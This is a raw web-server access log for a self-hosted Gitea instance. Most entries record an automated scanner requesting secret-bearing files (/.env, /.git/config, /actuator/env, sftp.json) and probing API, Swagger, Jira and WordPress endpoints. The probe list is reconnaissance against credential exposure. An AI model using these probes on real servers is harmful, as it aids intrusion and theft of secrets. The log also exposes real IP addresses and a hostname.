"Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:13 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/server" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:14 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/server" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:14 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/server-status" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:15 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/server-status" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:16 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/about" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:17 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/about" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:17 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/login.action" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:18 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/login.action" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:18 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/v2/_catalog" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:19 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/v2/_catalog" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:19 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.DS_Store" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:19 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.DS_Store" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:20 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.env" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:20 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.env" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:22 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:22 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:24 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.git/config" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:24 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.git/config" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:25 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/graphql" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:25 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/graphql" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:25 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/api" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:25 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/api/graphql" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:25 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/graphql/api" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:26 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/api" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:26 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/api/gql" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:26 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:26 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/api/graphql" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:27 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/config.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:27 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/graphql/api" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:27 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/api/gql" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:28 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:29 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/telescope/requests" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:29 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/config.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:29 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/info.php" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:30 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.well-known/security.txt" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:31 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/telescope/requests" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:31 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/actuator/env" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:31 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 95.215.39.14] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1" "-" -[15/Feb/2026:01:52:31 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/info.php" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:32 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 95.215.39.14] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1" "https://git.hanmocnn.co.kr/" -[15/Feb/2026:01:52:32 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.well-known/security.txt" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:33 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger-ui.html" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:33 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/actuator/env" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:34 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger/index.html" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:35 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:35 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger-ui.html" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:36 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:36 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger/index.html" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:37 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:37 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:38 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:38 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:39 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/v2/api-docs" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:39 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:40 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/v3/api-docs" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:40 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:41 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/api-docs/swagger.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:41 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/v2/api-docs" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:42 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/api/swagger.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:42 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/v3/api-docs" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:43 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/@vite/env" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:43 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/api-docs/swagger.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:44 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.vscode/sftp.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:44 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/api/swagger.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:45 +0000] - 502 502 - OPTIONS http git.hanmocnn.co.kr "/" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:45 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/@vite/env" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:46 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:46 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.vscode/sftp.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:47 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:47 +0000] - 502 502 - OPTIONS https git.hanmocnn.co.kr "/" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:48 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:49 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:53:44 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" -[15/Feb/2026:01:53:44 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" -[15/Feb/2026:01:53:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:53:47 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:53:47 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/" -[15/Feb/2026:01:53:49 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:53:49 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/" -[15/Feb/2026:01:53:50 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:53:50 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/" -[15/Feb/2026:01:54:02 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:54:02 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/" -[15/Feb/2026:01:54:17 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:54:17 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/" -[15/Feb/2026:01:54:51 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:54:51 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:54:54 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:54:55 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:56:08 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 54.86.115.253] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "RecordedFuture Global Inventory Crawler" "-" -[15/Feb/2026:01:56:14 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:01:56:15 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:01:57:04 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:57:34 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:57:44 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:58:15 +0000] - 502 502 - HEAD https git.hanmocnn.co.kr "/" [Client 146.70.185.32] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-" -[15/Feb/2026:02:04:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11447] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 3036] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 